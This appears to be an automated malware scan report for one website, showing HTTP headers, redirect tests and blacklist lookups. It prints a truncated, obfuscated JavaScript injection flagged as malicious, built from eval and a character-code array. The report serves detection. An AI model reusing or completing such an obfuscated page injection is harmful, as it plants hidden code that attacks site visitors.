Scanned pages/files
Request | Server response | Status |
http://needhishreebuildcon.com/ | 200 OK Content-Length: 5276 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) Object.prototype.qwe=function(){return String['fro'+'mCha'+'rCo'+'de'];};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){zxc={}[i];}v=document.createTextNode('asd');var s="";try{eval('asdvds');}catch(q){for(i in v)r=v.childNodes.length+1}r*=2;e=eval;m=[-r+11,-r+11,-r+107,-r+104,-r+34,-r+42,-r+102,-r+113,-r+101,-r+119,-r+111,-r+103,-r+112,-r+118,-r+48,-r+105,-r+103,-r+118,-r+71,-r+110,-r+103,-r+111,-r+103,-r+112,-r+118,-r+117,-r+68,-r+123,-r+86,-r+99,-r+105,-r+80,-r+ Antivirus reports:
| ||
http://needhishreebuildcon.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: needhishreebuildcon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 17:29:05 GMT
Accept-Ranges: bytes
ETag: "7d88c88-149c-50fbb5e176f41"
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev
Content-Length: 5276
Content-Type: text/html
Last-Modified: Mon, 23 Feb 2015 06:18:15 GMT
...5276 bytes of data.
GET / HTTP/1.1
Host: needhishreebuildcon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 17:29:05 GMT
Accept-Ranges: bytes
ETag: "7d88c88-149c-50fbb5e176f41"
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev
Content-Length: 5276
Content-Type: text/html
Last-Modified: Mon, 23 Feb 2015 06:18:15 GMT
...5276 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: needhishreebuildcon.com
Referer: http://www.google.com/search?q=needhishreebuildcon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: needhishreebuildcon.com
Referer: http://www.google.com/search?q=needhishreebuildcon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=needhishreebuildcon.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://needhishreebuildcon.com/
Result: needhishreebuildcon.com is not infected or malware details are not published yet.
Result: needhishreebuildcon.com is not infected or malware details are not published yet.